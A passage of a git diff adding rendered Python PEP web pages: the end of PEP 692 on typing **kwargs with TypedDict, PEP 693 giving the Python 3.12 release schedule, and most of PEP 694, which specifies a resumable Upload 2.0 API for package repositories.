Both destination and source functions have a **kwargs: Unpack[TypedDict] +parameter and the destination function’s TypedDict is assignable to the +source function’s TypedDict and the rest of the parameters are +compatible:

+
class Animal(TypedDict):
+    name: str
+
+class Dog(Animal):
+    breed: str
+
+def accept_animal(**kwargs: Unpack[Animal]): ...
+def accept_dog(**kwargs: Unpack[Dog]): ...
+
+accept_dog = accept_animal  # OK! Expression of type Dog can be
+                            # assigned to a variable of type Animal.
+
+accept_animal = accept_dog  # WRONG! Expression of type Animal
+                            # cannot be assigned to a variable of type Dog.
+
+
+
+
+

Source contains **kwargs and destination doesn’t

+

The destination callable doesn’t contain **kwargs, the source callable +contains **kwargs: Unpack[TypedDict] and the destination function’s keyword +arguments are assignable to the corresponding keys in the source function’s +TypedDict. Moreover, non-required keys should correspond to optional +function arguments, whereas required keys should correspond to required +function arguments. Again, the rest of the parameters have to be compatible. +Continuing the previous example:

+
class Example(TypedDict):
+    animal: Animal
+    string: str
+    number: NotRequired[int]
+
+def src(**kwargs: Unpack[Example]): ...
+def dest(*, animal: Dog, string: str, number: int = ...): ...
+
+dest = src  # OK!
+
+
+

It is worth pointing out that the destination function’s parameters that are to +be compatible with the keys and values from the TypedDict must be keyword +only:

+
def dest(dog: Dog, string: str, number: int = ...): ...
+
+dog: Dog = {"name": "Daisy", "breed": "labrador"}
+
+dest(dog, "some string")  # OK!
+
+dest = src                # Type checker error!
+dest(dog, "some string")  # The same call fails at
+                          # runtime now because 'src' expects
+                          # keyword arguments.
+
+
+

The reverse situation where the destination callable contains +**kwargs: Unpack[TypedDict] and the source callable doesn’t contain +**kwargs should be disallowed. This is because we cannot be sure that +additional keyword arguments are not being passed in when an instance of a +subclass had been assigned to a variable with a base class type and then +unpacked in the destination callable invocation:

+
def dest(**kwargs: Unpack[Animal]): ...
+def src(name: str): ...
+
+dog: Dog = {"name": "Daisy", "breed": "Labrador"}
+animal: Animal = dog
+
+dest = src      # WRONG!
+dest(**animal)  # Fails at runtime.
+
+
+

A similar situation can happen even without inheritance, as compatibility +between TypedDicts is based on structural subtyping.

+
+
+

Source contains untyped **kwargs

+

The destination callable contains **kwargs: Unpack[TypedDict] and the +source callable contains untyped **kwargs:

+
def src(**kwargs): ...
+def dest(**kwargs: Unpack[Movie]): ...
+
+dest = src  # OK!
+
+
+
+
+

Source contains traditionally typed **kwargs: T

+

The destination callable contains **kwargs: Unpack[TypedDict], the source +callable contains traditionally typed **kwargs: T and each of the +destination function TypedDict’s fields is assignable to a variable of +type T:

+
class Vehicle:
+    ...
+
+class Car(Vehicle):
+    ...
+
+class Motorcycle(Vehicle):
+    ...
+
+class Vehicles(TypedDict):
+    car: Car
+    moto: Motorcycle
+
+def dest(**kwargs: Unpack[Vehicles]): ...
+def src(**kwargs: Vehicle): ...
+
+dest = src  # OK!
+
+
+

On the other hand, if the destination callable contains either untyped or +traditionally typed **kwargs: T and the source callable is typed using +**kwargs: Unpack[TypedDict] then an error should be generated, because +traditionally typed **kwargs aren’t checked for keyword names.

+

To summarize, function parameters should behave contravariantly and function +return types should behave covariantly.

+
+
+
+

Passing kwargs inside a function to another function

+

A previous point +mentions the problem of possibly passing additional keyword arguments by +assigning a subclass instance to a variable that has a base class type. Let’s +consider the following example:

+
class Animal(TypedDict):
+    name: str
+
+class Dog(Animal):
+    breed: str
+
+def takes_name(name: str): ...
+
+dog: Dog = {"name": "Daisy", "breed": "Labrador"}
+animal: Animal = dog
+
+def foo(**kwargs: Unpack[Animal]):
+    print(kwargs["name"].capitalize())
+
+def bar(**kwargs: Unpack[Animal]):
+    takes_name(**kwargs)
+
+def baz(animal: Animal):
+    takes_name(**animal)
+
+def spam(**kwargs: Unpack[Animal]):
+    baz(kwargs)
+
+foo(**animal)   # OK! foo only expects and uses keywords of 'Animal'.
+
+bar(**animal)   # WRONG! This will fail at runtime because 'breed' keyword
+                # will be passed to 'takes_name' as well.
+
+spam(**animal)  # WRONG! Again, 'breed' keyword will be eventually passed
+                # to 'takes_name'.
+
+
+

In the example above, the call to foo will not cause any issues at +runtime. Even though foo expects kwargs of type Animal it doesn’t +matter if it receives additional arguments because it only reads and uses what +it needs completely ignoring any additional values.

+

The calls to bar and spam will fail because an unexpected keyword +argument will be passed to the takes_name function.

+

Therefore, kwargs hinted with an unpacked TypedDict can only be passed +to another function if the function to which the unpacked kwargs are being passed +has **kwargs in its signature as well, because then additional keywords +would not cause errors at runtime during function invocation. Otherwise, the +type checker should generate an error.

+

In cases similar to the bar function above the problem could be worked +around by explicitly dereferencing desired fields and using them as arguments +to perform the function call:

+
def bar(**kwargs: Unpack[Animal]):
+    name = kwargs["name"]
+    takes_name(name)
+
+
+
+
+

Using Unpack with types other than TypedDict

+

As described in the Rationale section, +TypedDict is the most natural candidate for typing **kwargs. +Therefore, in the context of typing **kwargs, using Unpack with types +other than TypedDict should not be allowed and type checkers should +generate errors in such cases.

+
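
For example:

+
def foo(**kwargs: Unpack[Movie]) -> None: ...      # OK! Movie is a TypedDict.
+
+def bar(**kwargs: Unpack[int]) -> None: ...        # WRONG! int is not a TypedDict.
+def baz(**kwargs: Unpack[list[str]]) -> None: ...  # WRONG! Not a TypedDict either.
+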
+
+

Changes to Unpack

+

Currently using Unpack in the context of +typing is interchangeable with using the asterisk syntax:

+
>>> Unpack[Movie]
+*<class '__main__.Movie'>
+
+
+

Therefore, in order to be compatible with the new use case, Unpack’s +repr should be changed to simply Unpack[T].

+
+
+
+

Intended Usage

+

The intended use cases for this proposal are described in the +Motivation section. In summary, more precise **kwargs typing +can bring benefits to already existing codebases that decided to use +**kwargs initially, but now are mature enough to use a stricter contract +via type hints. Using **kwargs can also help in reducing code duplication +and the amount of copy-pasting needed when there is a bunch of functions that +require the same set of keyword arguments. Finally, **kwargs are useful for +cases when a function needs to facilitate optional keyword arguments that don’t +have obvious default values.

+

However, it has to be pointed out that in some cases there are better tools +for the job than using TypedDict to type **kwargs as proposed in this +PEP. For example, when writing new code if all the keyword arguments are +required or have default values then writing everything explicitly is better +than using **kwargs and a TypedDict:

+
def foo(name: str, year: int): ...     # Preferred way.
+def foo(**kwargs: Unpack[Movie]): ...
+
+
+

Similarly, when type hinting third party libraries via stubs it is again better +to state the function signature explicitly - this is the only way to type such +a function if it has default arguments. Another issue that may arise in this +case when trying to type hint the function with a TypedDict is that some +standard function parameters may be treated as keyword-only:

+
def foo(name, year): ...              # Function in a third party library.
+
+def foo(**kwargs: Unpack[Movie]): ...  # Function signature in a stub file.
+
+foo("Life of Brian", 1979)            # This would now fail type
+                                      # checking, even though it is fine.
+
+foo(name="Life of Brian", year=1979)  # This would be the only way to call
+                                      # the function now that passes type
+                                      # checking.
+
+
+

Therefore, in this case it is again preferred to type hint such function +explicitly as:

+
def foo(name: str, year: int): ...
+
+
+

Also, for the benefit of IDEs and documentation pages, functions that are part +of the public API should prefer explicit keyword parameters whenever possible.

+
+
+

How to Teach This

+

This PEP could be linked in the typing module’s documentation. Moreover, a +new section on using Unpack could be added to the aforementioned docs. +Similar sections could be also added to the +mypy documentation and the +typing RTD documentation.

+
+
+

Reference Implementation

+

The mypy type checker already +supports more precise +**kwargs typing using Unpack.

+

Pyright type checker also +provides provisional support +for this feature.

+
+
+

Rejected Ideas

+
+

TypedDict unions

+

It is possible to create unions of typed dictionaries. However, supporting +typing **kwargs with a union of typed dicts would greatly increase the +complexity of the implementation of this PEP and there seems to be no +compelling use case to justify the support for this. Therefore, using unions of +typed dictionaries to type **kwargs as described in the context of this PEP +can result in an error:

+
class Book(TypedDict):
+    genre: str
+    pages: int
+
+TypedDictUnion = Movie | Book
+
+def foo(**kwargs: Unpack[TypedDictUnion]) -> None: ...  # WRONG! Unsupported use
+                                                        # of a union of
+                                                        # TypedDicts to type
+                                                        # **kwargs
+
+
+

Instead, a function that expects a union of TypedDicts can be +overloaded:

+
@overload
+def foo(**kwargs: Unpack[Movie]): ...
+
+@overload
+def foo(**kwargs: Unpack[Book]): ...
+
+
+
+
+

Changing the meaning of **kwargs annotations

+

One way to achieve the purpose of this PEP would be to change the +meaning of **kwargs annotations, so that the annotations would +apply to the entire **kwargs dict, not to individual elements. +For consistency, we would have to make an analogous change to *args +annotations.

+

This idea was discussed in a meeting of the typing community, and the +consensus was that the change would not be worth the cost. There is no +clear migration path, the current meaning of *args and **kwargs +annotations is well-established in the ecosystem, and type checkers +would have to introduce new errors for code that is currently legal.

+
+
+

Introducing a new syntax

+

In the previous versions of this PEP, using a double asterisk syntax was +proposed to support more precise **kwargs typing. Using this syntax, +functions could be annotated as follows:

+
def foo(**kwargs: **Movie): ...
+
+
+

Which would have the same meaning as:

+
def foo(**kwargs: Unpack[Movie]): ...
+
+
+

This greatly increased the scope of the PEP, as it would require a grammar +change and adding a new dunder for the Unpack special form. At the same +time, the justification for introducing a new syntax was not strong enough and +became a blocker for the whole PEP. Therefore, we decided to abandon the idea +of introducing a new syntax as a part of this PEP and may propose it again in a +separate one.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0692.rst

+

Last modified: 2024-02-16 16:12:21 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0693/index.html b/pep-0693/index.html new file mode 100644 index 00000000000..5c33c43ae8b --- /dev/null +++ b/pep-0693/index.html @@ -0,0 +1,229 @@ + + + + + + + + PEP 693 – Python 3.12 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 693 – Python 3.12 Release Schedule

+
+
Author:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Active
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
24-May-2022
+
Python-Version:
+
3.12
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.12.

+
+
+

Release Manager and Crew

+
    +
  • 3.12 Release Manager: Thomas Wouters
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

Release Schedule

+
+

3.12.0 schedule

+

Note: the dates below use a 17-month development period that results +in a 12-month release cadence between feature versions, as defined by +PEP 602.

+

Actual:

+
    +
  • 3.12 development begins: Sunday, 2022-05-08
  • +
  • 3.12.0 alpha 1: Monday, 2022-10-24
  • +
  • 3.12.0 alpha 2: Monday, 2022-11-14
  • +
  • 3.12.0 alpha 3: Tuesday, 2022-12-06
  • +
  • 3.12.0 alpha 4: Tuesday, 2023-01-10
  • +
  • 3.12.0 alpha 5: Tuesday, 2023-02-07
  • +
  • 3.12.0 alpha 6: Tuesday, 2023-03-07
  • +
  • 3.12.0 alpha 7: Tuesday, 2023-04-04
  • +
  • 3.12.0 beta 1: Monday, 2023-05-22 +(No new features beyond this point.)
  • +
  • 3.12.0 beta 2: Tuesday, 2023-06-06
  • +
  • 3.12.0 beta 3: Monday, 2023-06-19
  • +
  • 3.12.0 beta 4: Tuesday, 2023-07-11
  • +
  • 3.12.0 candidate 1: Sunday, 2023-08-06
  • +
  • 3.12.0 candidate 2: Wednesday, 2023-09-06
  • +
  • 3.12.0 candidate 3: Tuesday, 2023-09-19
  • +
  • 3.12.0 final: Monday, 2023-10-02
  • +
+
+
+

Bugfix releases

+

Actual:

+
    +
  • 3.12.1: Thursday, 2023-12-07
  • +
  • 3.12.2: Tuesday, 2024-02-06
  • +
  • 3.12.3: Tuesday, 2024-04-09
  • +
  • 3.12.4: Thursday, 2024-06-06
  • +
  • 3.12.5: Tuesday, 2024-08-06
  • +
  • 3.12.6: Friday, 2024-09-06
  • +
  • 3.12.7: Tuesday, 2024-10-01
  • +
  • 3.12.8: Tuesday, 2024-12-03
  • +
+

Expected:

+
    +
  • 3.12.9: Tuesday, 2025-02-04
  • +
  • 3.12.10: Tuesday, 2025-04-08
  • +
+
+
+

Source-only security fix releases

+

Provided irregularly on an as-needed basis until October 2028.

+
+
+

3.12 Lifespan

+

3.12 will receive bugfix updates approximately every 2 months for +approximately 18 months. Some time after the release of 3.13.0 final, +the ninth and final 3.12 bugfix update will be released. After that, +it is expected that security updates (source only) will be released +until 5 years after the release of 3.12.0 final, so until approximately +October 2028.

+
+
+
+

Features for 3.12

+

New features can be found in What’s New In Python 3.12.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0693.rst

+

Last modified: 2024-12-05 19:08:36 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0694/index.html b/pep-0694/index.html new file mode 100644 index 00000000000..4ca1531c0e2 --- /dev/null +++ b/pep-0694/index.html @@ -0,0 +1,784 @@ + + + + + + + + PEP 694 – Upload 2.0 API for Python Package Repositories | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 694 – Upload 2.0 API for Python Package Repositories

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
11-Jun-2022
+
Post-History:
+
27-Jun-2022
+
+
+
+
Table of Contents +
+
+

Abstract

+

There is currently no standardized API for uploading files to a Python package +repository such as PyPI. Instead, everyone has been forced to reverse engineer +the non-standard API from PyPI.

+

That API, while functional, leaks a lot of implementation details of the original +PyPI code base, which have had to be faithfully replicated in the new +code base and in alternative implementations.

+

Beyond the above, there are a number of major issues with the current API:

+
    +
  • It is a fully synchronous API, which means that we’re forced to have a single +request being held open for potentially a long time, both for the upload itself, +and then while the repository processes the uploaded file to determine success +or failure.
  • +
  • It does not support any mechanism for resuming an upload. With the largest file +size on PyPI being just under 1GB, that’s a lot of wasted bandwidth if +a large file hits a network blip towards the end of an upload.
  • +
  • It treats a single file as the atomic unit of operation, which can be problematic +when a release has multiple binary wheels: people may get +different versions while the files are uploading, and if the sdist happens to +not go last, some hard-to-build packages may end up being built +from source.
  • +
  • It has very limited support for communicating back to the user, with no support +for multiple errors, warnings, deprecations, etc. It is limited entirely to the +HTTP status code and reason phrase, of which the reason phrase has been +deprecated since HTTP/2 (RFC 7540).
  • +
  • The metadata for a release/file is submitted alongside the file, however this +metadata is famously unreliable, and most installers instead choose to download +the entire file and read the metadata from it, in part due to that unreliability.
  • +
  • There is no mechanism for allowing a repository to do any sort of sanity +checks before bandwidth starts getting expended on an upload, whereas a lot +of the cases of invalid metadata or incorrect permissions could be checked +prior to upload.
  • +
  • It has no support for “staging” a draft release prior to publishing it to the +repository.
  • +
  • It has no support for creating new projects, without uploading a file.
  • +
+

This PEP proposes a new API for uploads, and deprecates the existing non standard +API.

+
+
+

Status Quo

+

This does not attempt to be fully exhaustive documentation of the current API, but +gives a high level overview of the existing API.

+
+

Endpoint

+

The existing upload API (and the now removed register API) lives at a URL, currently +https://upload.pypi.org/legacy/, and to communicate which specific API you want +to call, you add a :action url parameter with a value of file_upload. The values +of submit, submit_pkg_info, and doc_upload also used to be supported, but +no longer are.

+

It also has a protocol_version parameter, in theory to allow new versions of the +API to be written, but in practice that has never happened, and the value is always +1.

+

So in practice, on PyPI, the endpoint is +https://upload.pypi.org/legacy/?:action=file_upload&protocol_version=1.

+
+
+

Encoding

+

The data to be submitted is submitted as a POST request with the content type +of multipart/form-data. This is due to the API’s history: it +was not actually designed as an API, but rather was a form on the initial PyPI +implementation, and client code was then written to programmatically submit that form.

+
+
+

Content

+

Roughly speaking, the metadata contained within the package is submitted as parts +where the content-disposition is form-data, and the name is the name of the +field. The names of these various pieces of metadata are not documented, and they +sometimes, but not always, match the names used in the METADATA files. The casing +rarely matches, and overall the METADATA to form-data conversion is +extremely inconsistent.

+

The file itself is then sent as an application/octet-stream part with the name +of content, and if there is a PGP signature attached, then it will be included +as an application/octet-stream part with the name of gpg_signature.

+
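
Putting that together, a rough client-side sketch of the legacy flow (a reconstruction +for illustration only, using the third-party requests library; form field names beyond +:action, protocol_version, content, and gpg_signature are undocumented and vary):

+
import requests
+
+with open("foo-1.0.tar.gz", "rb") as f:
+    response = requests.post(
+        "https://upload.pypi.org/legacy/",
+        data={
+            ":action": "file_upload",
+            "protocol_version": "1",
+            "name": "foo",       # metadata submitted as form-data fields...
+            "version": "1.0",    # ...alongside the file itself
+        },
+        files={"content": ("foo-1.0.tar.gz", f)},
+    )
+response.raise_for_status()
+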
+
+
+

Specification

+

This PEP traces the root cause of most of the issues with the existing API to be +roughly two things:

+
    +
  • The metadata is submitted alongside the file, rather than being parsed from the +file itself.
      +
    • This is actually fine if used as a pre-check, but it should be validated +against the actual METADATA or similar files within the distribution.
    • +
    +
  • +
  • It supports a single request, using nothing but form data, that either succeeds +or fails, and everything is done and contained within that single request.
  • +
+

We then propose a multi-request workflow, that essentially boils down to:

+
    +
  1. Initiate an upload session.
  2. +
  3. Upload the file(s) as part of the upload session.
  4. +
  5. Complete the upload session.
  6. +
  7. (Optional) Check the status of an upload session.
  8. +
+

All URLs described here will be relative to the root endpoint, which may be +located anywhere within the URL structure of a domain. So it could be at +https://upload.example.com/, or https://example.com/upload/.

+
+

Versioning

+

This PEP uses the same MAJOR.MINOR versioning system as used in PEP 691, +but it is otherwise independently versioned. The existing API is considered by +this spec to be version 1.0, but it otherwise does not attempt to modify +that API in any way.

+
+
+

Endpoints

+
+

Create an Upload Session

+

To create a new upload session, you can send a POST request to /, +with a payload that looks like:

+
{
+  "meta": {
+    "api-version": "2.0"
+  },
+  "name": "foo",
+  "version": "1.0"
+}
+
+
+

This currently has three keys, meta, name, and version.

+

The meta key is included in all payloads, and it describes information about the +payload itself.

+

The name key is the name of the project that this session is attempting to +add files to.

+

The version key is the version of the project that this session is attempting to +add files to.

+

If creating the session was successful, then the server must return a response +that looks like:

+
{
+  "meta": {
+    "api-version": "2.0"
+  },
+  "urls": {
+    "upload": "...",
+    "draft": "...",
+    "publish": "..."
+  },
+  "valid-for": 604800,
+  "status": "pending",
+  "files": {},
+  "notices": [
+    "a notice to display to the user"
+  ]
+}
+
+
+

Besides the meta key, this response has five keys, urls, valid-for, +status, files, and notices.

+

The urls key is a dictionary mapping identifiers to related URLs to this +session.

+

The valid-for key is an integer representing how long, in seconds, until the +server itself will expire this session (and thus all of the URLs contained in it). +The session SHOULD live for at least this much longer unless the client itself +has canceled the session. Servers MAY choose to increase this time, but should +never decrease it, except naturally through the passage of time.

+

The status key is a string that contains one of pending, published, +errored, or canceled; this string represents the overall status of +the session.

+

The files key is a mapping containing the filenames that have been uploaded +to this session, to a mapping containing details about each file.

+

The notices key is an optional key that points to an array of notices that +the server wishes to communicate to the end user that are not specific to any +one file.

+

For each filename in files the mapping has three keys, status, url, +and notices.

+

The status key is the same as the top level status key, except that it +indicates the status of a specific file.

+

The url key is the absolute URL that the client should upload that specific +file to (or use to delete that file).

+

The notices key is an optional key that is an array of notices that the server +wishes to communicate to the end user that are specific to this file.

+

The required response code to a successful creation of the session is a +201 Created response and it MUST include a Location header that is the +URL for this session, which may be used to check its status or cancel it.

+

For the urls key, there are currently three keys that may appear:

+

The upload key, which is the upload endpoint for this session to initiate +a file upload.

+

The draft key, which is the repository URL that these files are available at +prior to publishing.

+

The publish key, which is the endpoint to trigger publishing the session.

+

In addition to the above, if a second session is created for the same name+version +pair, then the upload server MUST return the already existing session rather +than creating a new, empty one.

+
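
A minimal client-side sketch of this step (the root endpoint is hypothetical; the +content type comes from the Content-Types section below):

+
import json
+import urllib.request
+
+payload = json.dumps({
+    "meta": {"api-version": "2.0"},
+    "name": "foo",
+    "version": "1.0",
+}).encode()
+
+request = urllib.request.Request(
+    "https://upload.example.com/",
+    data=payload,
+    method="POST",
+    headers={"Content-Type": "application/vnd.pypi.upload.v2+json"},
+)
+with urllib.request.urlopen(request) as response:
+    assert response.status == 201                # session created
+    session_url = response.headers["Location"]   # check status / cancel here
+    session = json.load(response)
+
+upload_url = session["urls"]["upload"]           # where file uploads are initiated
+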
+
+

Upload Each File

+

Once you have initiated an upload session for one or more files, then you have +to actually upload each of those files.

+

There is no set endpoint for actually uploading the file, that is given to the +client by the server as part of the creation of the upload session, and clients +MUST NOT assume that there is any commonality to what those URLs look like from +one session to the next.

+

To initiate a file upload, a client sends a POST request to the upload URL +in the session, with a request body that looks like:

+
{
+  "meta": {
+    "api-version": "2.0"
+  },
+  "filename": "foo-1.0.tar.gz",
+  "size": 1000,
+  "hashes": {"sha256": "...", "blake2b": "..."},
+  "metadata": "..."
+}
+
+
+

Besides the standard meta key, this currently has four keys:

+
    +
  • filename: The filename of the file being uploaded.
  • +
  • size: The size, in bytes, of the file that is being uploaded.
  • +
  • hashes: A mapping of hash names to hex encoded digests, each of these digests +are the digests of that file, when hashed by the hash identified in the name.

    By default, any hash algorithm available via hashlib (specifically any that can +be passed to hashlib.new() and do not require additional parameters) can +be used as a key for the hashes dictionary. At least one secure algorithm from +hashlib.algorithms_guaranteed MUST always be included. At the time +of this PEP, sha256 specifically is recommended.

    +

    Multiple hashes may be passed at a time, but all hashes must be valid for the +file.

    +
  • +
  • metadata: An optional key that is a string containing the file’s +core metadata.
  • +
+

Servers MAY use the data provided in this request to do some sanity checking +prior to allowing the file to be uploaded, which may include but is not limited +to:

+
    +
  • Checking if the filename already exists.
  • +
  • Checking if the size would invalidate some quota.
  • +
  • Checking if the contents of the metadata, if provided, are valid.
  • +
+

If the server determines that the client should attempt the upload, it will return +a 201 Created response, with an empty body, and a Location header pointing +to the URL that the file itself should be uploaded to.

+

At this point, the status of the session should show the filename, with the above URL +included in it.

+
+
Upload Data
+

To upload the file, a client has two choices: they may upload the file either as +a single chunk or as multiple chunks. Either option is acceptable, but it is +recommended that most clients should choose to upload each file as a single chunk, +as that requires fewer requests and typically has better performance.

+

However for particularly large files, uploading within a single request may result +in timeouts, so larger files may need to be uploaded in multiple chunks.

+

In either case, the client must generate a unique token (or nonce) for each upload +attempt for a file, and MUST include that token in each request in the Upload-Token +header. The Upload-Token is a binary blob encoded using base64 and surrounded by +a : on either side. Clients SHOULD use at least 32 bytes of cryptographically +random data. You can generate it using the following:

+
import base64
+import secrets
+
+header = ":" + base64.b64encode(secrets.token_bytes(32)).decode() + ":"
+
+
+

The one time that it is permissible to omit the Upload-Token from an upload +request is when a client wishes to opt out of the resumable or chunked file upload +feature completely. In that case, they MAY omit the Upload-Token, and the +file must be successfully uploaded in a single HTTP request, and if it fails, the +entire file must be resent in another single HTTP request.

+

To upload in a single chunk, a client sends a POST request to the URL from the +session response for that filename. The client MUST include a Content-Length +header that is equal to the size of the file in bytes, and this MUST match the +size given in the original session creation.

+

As an example, if uploading a 100,000 byte file, you would send headers like:

+
Content-Length: 100000
+Upload-Token: :nYuc7Lg2/Lv9S4EYoT9WE6nwFZgN/TcUXyk9wtwoABg=:
+
+
+

If the upload completes successfully, the server MUST respond with a +201 Created status. At this point this file MUST NOT be present in the +repository, but merely staged until the upload session has completed.

+

To upload in multiple chunks, a client sends multiple POST requests to the same +URL as before, one for each chunk.

+

This time however, the Content-Length is equal to the size, in bytes, of the +chunk that they are sending. In addition, the client MUST include an +Upload-Offset header which indicates the byte offset that the content included +in this request starts at, and an Upload-Incomplete header set to 1.

+

As an example, if uploading a 100,000 byte file in 1000 byte chunks, and this chunk +represents bytes 1001 through 2000, you would send headers like:

+
Content-Length: 1000
+Upload-Token: :nYuc7Lg2/Lv9S4EYoT9WE6nwFZgN/TcUXyk9wtwoABg=:
+Upload-Offset: 1001
+Upload-Incomplete: 1
+
+
+

However, the final chunk of data omits the Upload-Incomplete header, since +at that point the upload is no longer incomplete.

+

For each successful chunk, the server MUST respond with a 202 Accepted +status, except for the final chunk, which MUST be a 201 Created.

+

The following constraints are placed on uploads regardless of whether they are +single chunk or multiple chunks (a client-side sketch follows the list):

+
    +
  • A client MUST NOT perform multiple POST requests in parallel for the +same file to avoid race conditions and data loss or corruption. The server +MAY terminate any ongoing POST request that utilizes the same +Upload-Token.
  • +
  • If the offset provided in Upload-Offset is not 0 or the next chunk +in an incomplete upload, then the server MUST respond with a 409 Conflict.
  • +
  • Once an upload has started with a specific token, you may not use another token +for that file without deleting the in-progress upload.
  • +
  • Once a file has uploaded successfully, you may initiate another upload for +that file, and doing so will replace that file.
  • +
+
+
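
A sketch of the chunked flow described above (using the third-party requests library; +the file upload URL is hypothetical and would come from the Location header returned +when the file upload was initiated):

+
import base64
+import secrets
+
+import requests
+
+file_upload_url = "https://upload.example.com/session/foo-1.0.tar.gz"  # hypothetical
+token = ":" + base64.b64encode(secrets.token_bytes(32)).decode() + ":"
+CHUNK = 1000
+
+with open("foo-1.0.tar.gz", "rb") as f:
+    data = f.read()
+
+for offset in range(0, len(data), CHUNK):
+    chunk = data[offset:offset + CHUNK]
+    headers = {"Upload-Token": token, "Upload-Offset": str(offset)}
+    if offset + CHUNK < len(data):
+        headers["Upload-Incomplete"] = "1"  # omitted on the final chunk
+    # requests sets Content-Length automatically from the body.
+    requests.post(file_upload_url, data=chunk, headers=headers).raise_for_status()
+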
+
Resume Upload
+

To resume an upload, you first have to know how much of the data the server has +already received, regardless of if you were originally uploading the file as +a single chunk, or in multiple chunks.

+

To get the status of an individual upload, a client can make a HEAD request +with their existing Upload-Token to the same URL they were uploading to.

+

The server MUST respond back with a 204 No Content response, with an +Upload-Offset header that indicates what offset the client should continue +uploading from. If the server has not received any data, then this would be 0; +if it has received 1007 bytes, then it would be 1007.

+

Once the client has retrieved the offset that they need to start from, they can +upload the rest of the file as described above, either in a single request +containing all of the remaining data or in multiple chunks.

+
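
Continuing the chunked-upload sketch above (same hypothetical URL and token), +resumption looks roughly like:

+
head = requests.head(file_upload_url, headers={"Upload-Token": token})
+assert head.status_code == 204
+offset = int(head.headers["Upload-Offset"])  # bytes the server already has
+
+with open("foo-1.0.tar.gz", "rb") as f:
+    f.seek(offset)
+    remaining = f.read()
+
+requests.post(
+    file_upload_url,
+    data=remaining,
+    headers={"Upload-Token": token, "Upload-Offset": str(offset)},
+).raise_for_status()
+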
+
+
Canceling an In Progress Upload
+

If a client wishes to cancel an upload of a specific file, for instance because +they need to upload a different file, they may do so by issuing a DELETE +request to the file upload URL with the Upload-Token used to upload the +file in the first place.

+

A successful cancellation request MUST respond with a 204 No Content.

+
+
+
Delete an uploaded File
+

Already uploaded files may be deleted by issuing a DELETE request to the file +upload URL without the Upload-Token.

+

A successful deletion request MUST respond with a 204 No Content.

+
+
+
+

Session Status

+

Similarly to file upload, the session URL is provided in the response to +creating the upload session, and clients MUST NOT assume that there is any +commonality to what those URLs look like from one session to the next.

+

To check the status of a session, clients issue a GET request to the +session URL, to which the server will respond with the same response that +they got when they initially created the upload session, except with any +changes to status, valid-for, or updated files reflected.

+
+
+

Session Cancellation

+

To cancel an upload session, a client issues a DELETE request to the +same session URL as before, at which point the server marks the session as +canceled, MAY purge any data that was uploaded as part of that session, +and future attempts to access that session URL or any of the file upload URLs +MAY return a 404 Not Found.

+

To prevent a lot of dangling sessions, servers may also choose to cancel a +session of their own accord. It is recommended that servers expunge their +sessions after no less than a week, but each server may choose their own +schedule.

+
+
+

Session Completion

+

To complete a session, and publish the files that have been included in it, +a client MUST send a POST request to the publish URL in the +session status payload.

+

If the server is able to immediately complete the session, it may do so +and return a 201 Created response. If it is unable to immediately +complete the session (for instance, if it needs to do processing that may +take longer than reasonable in a single HTTP request), then it may return +a 202 Accepted response.

+

In either case, the server should include a Location header pointing +back to the session status URL, and if the server returned a 202 Accepted, +the client may poll that URL to watch for the status to change.

+
+
+
+

Errors

+

All Error responses that contain a body will have a body that looks like:

+
{
+  "meta": {
+    "api-version": "2.0"
+  },
+  "message": "...",
+  "errors": [
+    {
+      "source": "...",
+      "message": "..."
+    }
+  ]
+}
+
+
+

Besides the standard meta key, this has two top level keys, message +and errors.

+

The message key is a singular message that encapsulates all errors that +may have happened on this request.

+

The errors key is an array of specific errors, each of which contains +a source key, which is a string that indicates what the source of the +error is, and a message key for that specific error.

+

The message and source strings do not have any specific meaning, and +are intended for human interpretation to figure out what the underlying issue +was.

+
+
+

Content-Types

+

Like PEP 691, this PEP proposes that all requests and responses from the +Upload API will have a standard content type that describes what the content +is, what version of the API it represents, and what serialization format has +been used.

+

The structure of this content type will be:

+
application/vnd.pypi.upload.$version+format
+
+
+

Since only major versions should be disruptive to systems attempting to +understand one of these API content bodies, only the major version will be +included in the content type, and will be prefixed with a v to clarify +that it is a version number.

+

Unlike PEP 691, this PEP does not change the existing 1.0 API in any +way, so servers will be required to host the new API described in this PEP at +a different endpoint than the existing upload API.

+

Which means that for the new 2.0 API, the content types would be:

+
    +
  • JSON: application/vnd.pypi.upload.v2+json
  • +
+

In addition to the above, a special “meta” version is supported named latest, +whose purpose is to allow clients to request the absolute latest version, without +having to know ahead of time what that version is. It is recommended, however, +that clients be explicit about what versions they support.

+

These content types DO NOT apply to the file uploads themselves, only to the +other API requests/responses in the upload API. The files themselves should use +the application/octet-stream content-type.

+
+
+

Version + Format Selection

+

Again similar to PEP 691, this PEP standardizes on using server-driven +content negotiation to allow clients to request different versions or +serialization formats, which includes the format url parameter.

+

Since this PEP expects the existing legacy 1.0 upload API to exist at a +different endpoint, and it currently only provides for JSON serialization, this +mechanism is not particularly useful, and clients only have a single version and +serialization they can request. However, clients SHOULD be set up to handle +content negotiation gracefully in the case that additional formats or versions +are added in the future.

+
+
+
+

FAQ

+
+

Does this mean PyPI is planning to drop support for the existing upload API?

+

At this time PyPI does not have any specific plans to drop support for the +existing upload API.

+

Unlike with PEP 691, there are wide benefits to doing so, so it is likely that we will want to drop support for it at some point in the future. But until this API is implemented and receiving broad use, it would be premature to make any plans for actually dropping support for it.

+
+
+

Is this Resumable Upload protocol based on anything?

